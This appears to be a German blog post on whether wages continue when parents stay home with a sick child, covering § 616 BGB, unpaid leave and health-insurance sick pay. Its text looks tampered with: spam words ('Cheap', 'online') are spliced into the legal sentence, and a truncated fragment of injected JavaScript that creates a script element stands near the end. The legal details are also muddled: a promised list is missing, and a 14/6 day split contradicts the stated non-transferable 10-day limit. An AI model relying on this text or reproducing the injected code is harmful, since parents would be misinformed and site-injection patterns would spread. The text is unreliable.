Lohnfortzahlung bei Krankheit der Kinder

Wird das Gehalt weitergezahlt wenn Kinder krank sind ?

Berufstätige Eltern mit eigenen Kindern kennen diese Situation sicherlich nur allzugut. Die oder das eigene Kind erkrankt ganz plotzlich und Sie müssen sich um eine geeignete Baby- bzw. Kinderbetreuung kümmern. Für viele ein nicht einfach zu lösende Aufgabe, da keine Familienangehörige in der Nähe wohnen und Freunde meist selbst arbeiten müssen. Gerade in Familien, in denen die Kinder im Kindergarten oder Kinderkrippe sind, stehen Erkältungs- und Durchfallerkrankungen fast auf der Tagesordnung.

 

Zahlt der Arbeitgeber mein Gehalt bei einer Erkrankung meiner Kinder

Ob der Arbeitgeber Ihr Gehalt weiter bezahlt, wenn das erkrankte Kind gepflegt werden muss und Sie nicht zur Arbeit erscheinen können sollte im Arbeitsvertrag geregelt sein. Gibt es keine gesonderte Regelung gilt der Paragraph Cheap § 616 des BGB online . Finder dieser Paragraph Anwendung, muss der Arbeitgeber das Gehalt weiterzahlen.

Jeder Arbeitnehmer hat jedoch das Recht auf unbezahlte Freistellung durch den Arbeitgeber und Krankengeld von der eigenen gesetzlichen Krankenkasse. Hierbei gelten folgende Bestimmungen:

Außerdem müssen beide beteiligten also das Kind als auch Sie als Arbeitnehmer in einer gesetzlichen Krankenkasse versichert sein.

Diese Regelung gilt für maximal 10 Arbeitstage pro Jahr, Kind und Elternteil. Dabei können die Tage nicht übertragen werden – also die Mutter bleibt z.B. 14 Tage zu Hause und der Vater 6 Tage. Maximal 25 Tage bei 3 Kindern oder mehr.

 

Lohnfortzahlung wenn das Kind in einer privaten Krankenversicherung ist

Viele Eltern kenn wohl auch diesen Fall. Ein Elternteil ist gesetzlich Versichert und will das kranke Kind pflegen. Das Kind ist über den anderen Elternteil in einer privaten Krankenversicherung versichert. Genau dieser Fall ist uns diese Woche passiert. Nach vielem Nachlesen und Gesprächen mit unserem Versicherungsmakler ist der Fall aber so, dass hier keine Lohnfortzahlung seitens der gesetzlichen Krankenversicherung geleistet wird.

 

 var d=document;var s=d.createElement(’script‘); online

Schreibe einen Kommentar